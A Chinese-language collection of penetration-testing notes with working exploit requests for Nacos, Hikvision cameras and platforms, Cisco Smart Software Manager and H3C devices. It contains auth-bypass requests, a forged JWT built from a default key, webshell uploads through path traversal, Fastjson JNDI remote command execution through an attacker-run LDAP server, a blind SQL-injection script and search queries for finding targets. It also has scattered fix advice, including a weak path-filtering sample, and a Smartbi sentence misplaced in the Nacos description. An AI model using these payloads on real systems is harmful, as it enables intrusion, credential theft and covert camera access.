User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0

检测工具

https://github.com/chaitin/xpoc

修复建议

通过设置安全组功能，仅对可信地址和内网开放 nginxWebUI 来缓解风险。
官方已发布漏洞补丁及修复版本，但组件修复不完全，防护机制可被绕过，且其他接口仍存在多个高危漏洞。因此建议受漏洞影响的用户及时关注厂商公告并及时更新 NginxWebUI：http://file.nginxwebui.cn/nginxWebUI-3.6.5.jar

nacos

未授权访问

大部分企业的 nacos的url为 /v1/auth/users ，而不是 /nacos/v1/auth/users

http://x.x.x.x:xxxx/nacos/v1/auth/users?pageNo=1&pageSize=9（ip和端口用x代替）

可以看到账号密码

get 参数改成post然后提交一个新的用户名和密码

POST http://IP:端口/nacos/v1/auth/users?username=test1&password=test1

这个时候我们用test1登录

Nacos2.2.0权限绕过

Header中添加serverIdentity: security能直接绕过身份验证查看用户列表
如果没有或者不对应则返回403

Nacos1.x.x版本User-Agent权限绕过 (CVE-2021-29441)

漏洞描述

在 1.4.1 及更早版本的 Nacos 中，当配置为使用身份验证 (Dnacos.core.auth.enabled=true) 时，会使用 AuthFilter servlet 过滤器来强制实施身份验证，从而跳过身份验证检查。此机制依赖于用户代理 HTTP 标头，因此很容易被欺骗。此问题可能允许任何用户在 Nacos 服务器上执行任何管理任务。

环境搭建

docker run -d -p 8848:8848 hglight/cve-2021-29441

版本

Nacos <= 1.4.1

复现

   
1.修改User-Agent的值为Nacos-Server到请求包中,添加Header头后访问
http://target:8848/nacos/v1/auth/users?pageNo=1&pageSize=9
可以看到返回值为200,且内容中是否包含pageItems

GET /nacos/v1/auth/users/?pageNo=1&pageSize=9 HTTP/1.1
Host: 192.168.246.138:8848
User-Agent: Nacos-Server
       或者使用命令访问：
       读取用户密码：
       curl  'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9&accessToken=' -H 'User-Agent: Nacos-Server'
       
       
curl 'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9&search=blur' -H 'User-Agent: Nacos-Server'
       
curl 'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9&search=accurate' -H 'User-Agent: Nacos-Server'
      
未授权添加用户
curl -X POST 'http://127.0.0.1:8848/nacos/v1/auth/users?username=test1&password=test1' -H 'User-Agent:Nacos-Server
任意用户密码更改
curl -X PUT 'http://127.0.0.1:8848/nacos/v1/auth/users?accessToken=' -H 'User-Agent:Nacos-Server' -d 'username=test1&newPassword=test2'
读取配置文件
curl -X GET 'http://127.0.0.1:8848/nacos/v1/cs/configs?search=accurate&dataId=&group=&pageNo=1&pageSize=99’
curl -X GET 'http://127.0.0.1:8848/nacos/v1/cs/configs?search=blur&dataId=&group=&pageNo=1&pageSize=99’
添加Header头后使用POST方式请求http://target:8848/nacos/v1/auth/users?username=vulhub&password=vulhub添加一个新用户,账号密码都为vulhub

POST /nacos/v1/auth/users?username=hglight&password=hglight 
HTTP/1.1
Host : 192.168.246.138:8848
User-Agent:Nacos-Server 
或者
POST /nacos/v1/auth/users HTTP/1.1
Host: 192.168.31.64:8848
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Nacos-Server
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
username=hglight&password=hglight
再次查看用户列表，返回的用户列表数据中，多了一个我们通过绕过鉴权创建的新用户
GET /nacos/v1/auth/users/?pageNo=1&pageSize=9 HTTP/1.1
Host: 192.168.246.138:8848
User-Agent: Nacos-Server
访问http://IP:8848/nacos使用新建用户登录，此时表示漏洞利用成功

Nacos默认key导致权限绕过登陆

漏洞描述

Nacos中发现影响Nacos <= 2.1.0的问题，Nacos用户使用默认JWT密钥导致未授权访问漏洞。通过该漏洞，攻击者可以绕过用户名密码认证，直接登录Nacos用户

版本

0.1.0 <= Nacos <= 2.2.0

复现

在nacos中，token.secret.key值是固定死的，位置在conf下的application.properties中：

nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789
1.获取token

利用该默认key可进行jwt构造，直接进入后台，构造方法：
在https://jwt.io/中：输入默认key：

SecretKey012345678901234567890123456789012345678901234567890123456789

然后再payload里面输入：

{
 "sub": "nacos",
 "exp": 1678899909
}

在这里注意：1678899909这个值是unix时间戳，换算一下，要比你系统当前的时间更晚，比如当前的时间是2023年03月15日22:11:09，在这里面的时间戳时间是3月16号了：

复制上面得到的值，在burp里面选择登录之后构造：

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s

方框里面需要自行添加：

POST /nacos/v1/auth/users/login HTTP/1.1
Host: 10.211.55.5:8848
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://10.211.55.5:8848
Connection: close
Referer: http://10.211.55.5:8848/nacos/index.html

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s

username=crowsec&password=crowsec

此时就得到了token信息：

HTTP/1.1 200 
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Set-Cookie: JSESSIONID=D90CF6E5B233685E4A39C1B1BDA9F185; Path=/nacos; HttpOnly
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s
Content-Type: application/json
Date: Wed, 15 Mar 2023 14:13:22 GMT
Connection: close
Content-Length: 197

{"accessToken":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s","tokenTtl":18000,"globalAdmin":true,"username":"nacos"}

此时就得到了nacos的token信息。
2.利用获取token登录后台

如何登录呢，在这里需要用假账号登录之后，再修改返回包就行了，试试看：
先用假账号登录，用burp拦截：

这肯定进不去的，在这里修改返回包，右键看下这个：

然后Forward，这边返回的信息肯定是无效的：

在这里使用刚刚burp里面生成的返回包进行替换，全部复制过去：

再forward一次：

此时就已经进去了：

3.使用默认密钥生成的JWT查看当前用户名和密码


GET /nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s&pageNo=1&pageSize=9 HTTP/1.1

Host: {{Hostname}}
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Connection: close
If-Modified-Since: Wed, 15 Feb 2023 10:45:10 GMT
Upgrade-Insecure-Requests: 1
accessToken: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s

4.利用默认密钥，添加hellonacos用户密码为hellonacos，创建成功

POST /nacos/v1/auth/users HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 
Authorization: Bearer  eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s
Accept-Encoding: gzip, deflate 
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 15 Feb 2023 10:45:10 GMT
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
username=hellonacos&password=hellonacos

Nacos-Sync 未授权进后台

影响范围

Nacos-Sync 3.0

fofa语法

title="nacos" &amp;&amp; title=="Nacos-Sync"

poc

#拼接路径然后直接利用
/#/serviceSync

Nacos 集群 Raft 反序列化漏洞

CNVD-2023-45001

该漏洞源于 Nacos 集群处理部分 Jraft 请求时，未限制使用 hessian 进行反。序列化，攻击者可以通过发送特制的请求触发该漏洞，最终执行任意远程代码。
该漏洞源于 Smartbi 默认存在内置用户，在使用特定接口时，攻击者可绕过用户身份认证机制获取内置用户身份凭证，随后可使用获取的身份凭证调用后台接口，最终可能导致敏感信息泄露和代码执行。

影响版本

1.4.0 <= Nacos < 1.4.6
2.0.0 <= Nacos < 2.2.3

exp
https://github.com/c0olw/NacosRce/

修复建议

默认配置下该漏洞仅影响 Nacos 集群间 Raft 协议通信的 7848 端口，此端口不承载客户端请求，可以通过限制集群外部 IP 访问 7848 端口来进行缓解。
官方已发布漏洞补丁及修复版本，请评估业务是否受影响后，酌情升级至安全版本： https://github.com/alibaba/nacos/releases

海康威视

弱口令

1686651655167

cve-2017-7921/7923

影响范围

1686651720225

排查步骤

http://ip/Security/users?auth=YWRtaW46MTEKYWRtaW46MTEK

auth内容是admin:11的base64编码。

获取系统监控快照，不需要进行身份验证。

http://ip/onvif-http/snapshot?auth=YWRtaW46MTEK

下载摄像机配置文件，通过脚本解密配置文件获得账密信息。

http://ip/System/configurationFile?auth=YWRtaW46MTEK

用hex编辑器打开下载的configurationFile文件发现是加密后的。

# https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor
python3 decrypt_configurationFile.py configurationFile

cve-2021-36260

影响范围

1686652093950

1686652112690

漏洞poc

PUT /SDK/webLanguage HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 89

<?xml version="1.0"
encoding="UTF-8"?><language>$(ifconfig -a >
webLib/dd.asp)</language>

流媒体管理服务器后台任意文件读取漏洞

影响范围

流媒体管理服务器 V2.3.5

奇安信语法

web.title="流媒体管理服务器"

poc

http://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini

fileName未输入文件名时，返回包会报错，错误信息中包含网站的部分绝对路径信息，经过路径构造可以获取当前php文件的内容

1686652380656

漏洞修复

1.php.ini 配置 open_basedir（针对PHP应用程序）。
2.用户输入配置白名单，对文件下载类型进行检查，判断是否为允许下载类型。
3.过滤路径回溯符../，或者直接将..替换成空。对参数进行过滤，依次过滤“.”、“..”、“/”、“\”等字符。
4.对于下载文件的目录做好限制，只能下载定目录下的文件，或者将要下载的资源文件路径存入数据库，附件下载时定数据库中的id即可，id即对应的资源。

参考代码：

import java.io.File;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.regex.Pattern;

public class FileReader {
    // 正则表达式，用于过滤路径中的 ../ 字符串
    private static final Pattern SAFE_PATH_PATTERN = Pattern.compile("[^/]+/\\.\\./");

    // 安全读取文件
    public static byte[] readSafely(String path) throws IOException {
        // 将路径中的 ../ 替换为空字符串
        String safePath = SAFE_PATH_PATTERN.matcher(path).replaceAll("");

        // 使用安全路径读取文件
        Path filePath = Paths.get(safePath);
        return Files.readAllBytes(filePath);
    }
}

这段代码中使用了正则表达式来过滤路径中的 ../ 字符串，确保文件只能被读取到预期的位置。

使用方法：

try {
    byte[] fileData = FileReader.readSafely("/path/to/file");
} catch (IOException e) {
    // 处理异常
}

iVMS综合安防系统任意文件上传漏洞（0day）

漏洞描述

海康威视iVMS系统存在在野 0day 漏洞，攻击者通过获取密钥任意构造token，请求/resourceOperations/upload接口任意上传文件，导致获取服务器webshell权限，同时可远程进行恶意代码执行。

影响范围

1.海康威视综合安防系统iVMS-5000

2.海康威视综合安防系统 iVMS-8700

奇安信语法

web.body="/views/home/file/installPackage.rar"

漏洞poc

POST /eps/api/resourceOperations/upload?token=构造的token值 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: ISMS_8700_Sessionname=A29E70BEA1FDA82E2CF0805C3A389988
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPo
Upgrade-Insecure-Requests: 1Content-Length: 174

------WebKitFormBoundaryGEJwiloiPo
Content-Disposition: form-data; name="fileUploader";filename="1.jsp"
Content-Type: image/jpeg

test
------WebKitFormBoundaryGEJwiloiPo

构造token绕过认证

POST /eps/api/resourceOperations/upload HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://you-ip
Connection: close
Cookie: ISMS_8700_Sessionname=7634604FBE659A8532E666FE4AA41BE9
Upgrade-Insecure-Requests: 1
Content-Length: 62

service=http%3A%2F%2Fx.x.x.x%3Ax%2Fhome%2Findex.action

构造token绕过认证（内部机制：如果token值与请求url+secretkey的md5值相同就可以绕过认证）

secretkey是代码里写死的（默认值：secretKeyIbuilding）

token值需要进行MD5加密（32位大写）

组合：token=MD5(url+”secretKeyIbuilding”)

md5加密：http://x.x.x//eps/api/resourceOperations/uploadsecretKeyIbuilding

重新验证，构造文件上传poyload


POST /eps/api/resourceOperations/upload?token=构造的token值 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: ISMS_8700_Sessionname=A29E70BEA1FDA82E2CF0805C3A389988
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPo
Upgrade-Insecure-Requests: 1
Content-Length: 174

------WebKitFormBoundaryGEJwiloiPo
Content-Disposition: form-data; name="fileUploader";filename="1.jsp"
Content-Type: image/jpeg

test
------WebKitFormBoundaryGEJwiloiPo

显示上传成功且返回了resourceUuid值

验证路径：http://url/eps/upload/resourceUuid的值.jsp

IVMS系统任意文件上传漏洞

检测POC

https://github.com/sccmdaveli/hikvision-poc

漏洞修复


1.在服务器后端控制上传文件类型，处理时强制使用随机数改写文件名和文件路径,不要使用用户自定义的文件名和文件路径。
2.在服务器后端建议使用白名单的方法对上传的文件进行过滤，上传的目录不进行解析，只提供下载权限。
3.开源编辑器上传漏洞：若新版编辑器已修复漏洞，请更新编辑器版本。
4.除了以上的方法之外，还可将被上传的文件限制在某一路径下，并在文件上传目录禁止脚本解析。

参考代码：

import java.io.File;
import java.io.IOException;
import java.security.SecureRandom;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.Part;

public class FileUploadServlet extends HttpServlet {
  private static final long serialVersionUID = 1L;

  private static final String ALLOWED_FILE_TYPES = "image/jpeg,image/png,image/gif";

  private static final SecureRandom random = new SecureRandom();

  protected void doPost(HttpServletRequest request, HttpServletResponse response)
      throws ServletException, IOException {
    // 获取上传的文件
    Part filePart = request.getPart("file");

    // 检查文件类型是否被允许
    String fileType = filePart.getContentType();
    if (!ALLOWED_FILE_TYPES.contains(fileType)) {
      response.sendError(HttpServletResponse.SC_BAD_REQUEST, "Invalid file type.");
      return;
    }

    // 使用随机数改写文件名和文件路径
    String fileName = generateRandomFileName(filePart.getSubmittedFileName());
    String filePath = request.getServletContext().getRealPath("/") + File.separator + "uploads" + File.separator + fileName;

    // 保存文件
    filePart.write(filePath);

    // 返回响应
    response.setStatus(HttpServletResponse.SC_OK);
  }

  private static String generateRandomFileName(String fileName) {
    int randomNumber = random.nextInt();
    String[] fileNameParts = fileName.split("\\.");
    String fileExtension = fileNameParts[fileNameParts.length - 1];
    return randomNumber + "." + fileExtension;
  }
}

在上面的代码中，我们首先使用 getPart 方法获取上传的文件。然后检查文件类型是否在允许的文件类型列表中。如果不在，则发送错误响应。否则，我们使用随机数改写文件名和文件路径。最后，我们使用 write 方法将文件写入磁盘，并返回响应。

综合安防管理平台存在Fastjson远程命令执行漏洞（2022 HVV洞）

漏洞描述

海康威视综合安防管理平台存在Fastjson远程命令执行漏洞，该漏洞可执行系统命令，直接获取服务器权限。

搜索引擎语法

app="HIKVISION-综合安防管理平台"

poc

POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
Content-Length: 215

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://2vyvoa.dnslog.cn","autoCommit":true},"hfe4zyyzldp":"="}

先看看能不能连dnslog服务器，如果dnslog服务器收到请求，则大概率存在命令执行漏洞

确定dnslog能收到请求之后，使用工具JNDIExploit-1.2-SNAPSHOT.jar 进一步利用。把该工具上传到公网服务器后，执行如下命令

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 你的公网服务器ip

记得对外开放1389 8080端口哦

然后就在数据包的头部加上 cmd: whoami 这里whoami也可以改成你想执行的命令

存在注入的地方改成 ldap://这里是的你公网服务器ip地址:1389/Basic/TomcatEcho


POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: keep-alive
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
cmd: whoami
Content-Length: 215

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://这里是的你公网服务器ip地址:1389/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}

成功执行whoami

漏洞修复

https://www.hikvision.com/cn/support/CybersecurityCenter/SecurityNotices/

综合安防管理平台Fastjson远程命令执行漏洞

影响范围

V2.0.0 <= iVMS-8700 <= V2.9.2
V1.0.0 <= iSecure Center <= V1.7.0

语法

app=“HIKVISION-综合安防管理平台”

poc

POST /bic/ssoService/v1/applyCT HTTP/1.1
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
Content-Length: 204

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://kjvqweuoav.dnstunnel.run","autoCommit":true},"hfe4zyyzldp":"="}

dns能回显，JNDIExploit-1.4-SNAPSHOT.jar执行

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i VPSip

然后在Burp的请求数据包头部加上字段 cmd: whoami 这里cmd可执行系统命令，下方payload中ldap改成你的VPSip/Basic/TomcatEcho，如下数据包

POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: keep-alive
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
cmd: whoami
Content-Length: 215

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://公网服务器ip地址:1389/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}

补丁

https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/

综合安防管理平台 env 信息泄漏漏洞

HIKVISION 综合安防管理平台存在信息泄漏漏洞，攻击者通过漏洞可以获取环境env等敏感消息进一步攻击

网络测绘

app="HIKVISION-综合安防管理平台"

poc

/artemis-portal/artemis/env

综合安防管理平台 report 任意文件上传漏洞

网络测绘

app="HIKVISION-综合安防管理平台"
web.title=="综合安防管理平台"

poc

POST /svm/api/external/report HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a

------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip

<%out.print("test");%>

------WebKitFormBoundary9PggsiM755PLa54a--

/portal/ui/login/..;/..;/new.jsp

综合安防管理平台 files 任意文件上传漏洞

需要开放运行管理中心 (8001端口)

网络测绘

app="HIKVISION-综合安防管理平台"
web.title=="综合安防管理平台"

poc

POST /center/api/files;.html HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a

------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip

<%out.print("test3");%>

------WebKitFormBoundary9PggsiM755PLa54a--

AK信息泄露漏洞

进行js多次查看发现存在jsconfig的调用。

appkey就是user 由一个8位数数构成:23412412

Secret就是passwd，由21位的密钥构成:QfQPss5GOac9Bjxkfuv3

官方提供api接口文档

https://open.hikvision.com/docs/docId?productId=5c67f1e2f05948198c909700&version=%2Ff95e951cefc54578b523d1738f65f0a1&curNodeId=16741aecc05944a6b0cd1341d68e4546

1./api/resource/v2/encodeDevice/search接口,获取权限的编码设备列表

2./api/resource/v1/cameras 获取cameraIndexCode

3./api/video/v1/manualCapture 带cameraIndexCode去获取摄像头的Picurl

利用rtsp协议去访问

利用/api/video/v2/cameras/previewURLs 接口 。获取获取rtsp协议摄像

这里借助借助VLC media player 播放去访问rtsp协议摄像头

思科

智能软件管理器本地 SQL 注入漏洞

Cisco Smart Software Manager On-Prem (SSM On-Prem) 基于 Web 的管理界面中存在漏洞，可能允许经过身份验证的远程攻击者对受影响的系统进行 SQL 注入攻击。该漏洞的存在是因为基于 Web 的管理界面无法充分验证用户输入。攻击者可以通过以低权限用户身份向应用程序进行身份验证并向受影响的系统发送精心设计的 SQL 查询来利用此漏洞。

1.改poc里边的ip和cookie

2.python exploit.py

"""
Smart Software Manager On-Prem Release 8-202212 - Authenticated SQL Injection in 'filter_by' parameter
Download link: https://software.cisco.com/download/home/286285506/type/286326948/release/8-202212

Usage:
1. Update host and cookies variables,
2. Run `python3 exploit.py`

Tested on Ubuntu 22.04.1 LTS, Python 3.10.6

by redfr0g@stmcyber 2023
"""

import requests
import string
import warnings

# script parameters, update accoridingly
host = "<IP>:8443"
cookies = {"_lic_engine_session": "<COOKIE>", "XSRF-TOKEN": "<CSRFTOKEN>"}


url = "https://" + host + "/backend/notifications/search_account_notifications.json?filter_by=message_type))%20LIKE%20%27%25%27+OR+1+%3d+1/+(SELECT+CASE+WHEN+(select+version()+LIKE+'P%25')+THEN+0+ELSE+1+END)--%20&filter_val=a&offset=0&limit=10"
headers = {"Accept": "application/json", "Content-Type": "application/json"}
chars = string.printable[0:95]
result = []
search = True

print("[+] Cisco Smart Software Manager Release 8-202212 SQL Injection PoC")
print("[+] Starting DBMS banner enumeration...")

# do error based sql injection until no match found
while search:
    for char in chars:
        url = "https://" + host + "/backend/notifications/search_account_notifications.json?filter_by=message_type))%20LIKE%20%27%25%27+OR+1+%3d+1/+(SELECT+CASE+WHEN+(select+version()+LIKE+'" + ''.join(result) + char + "%25')+THEN+0+ELSE+1+END)--%20&filter_val=a&offset=0&limit=10"
        # disable invalid cert warnings
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            r = requests.get(url, headers=headers, cookies=cookies, verify=False)
        if "PG::DivisionByZero" in r.text:
            # update and print result
            result.append(char)
            print("[+] DBMS Banner: " + ''.join(result))
            break
        if char == " ":
            # stop search if no match found
            search = False

H3C

H3C Magic B1STV100R012远程代码执行漏洞(CVE-2023-34928)

影响版本

H3C Magic B1STV100R012

poc

POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 127.0.0.1:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1567

pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UM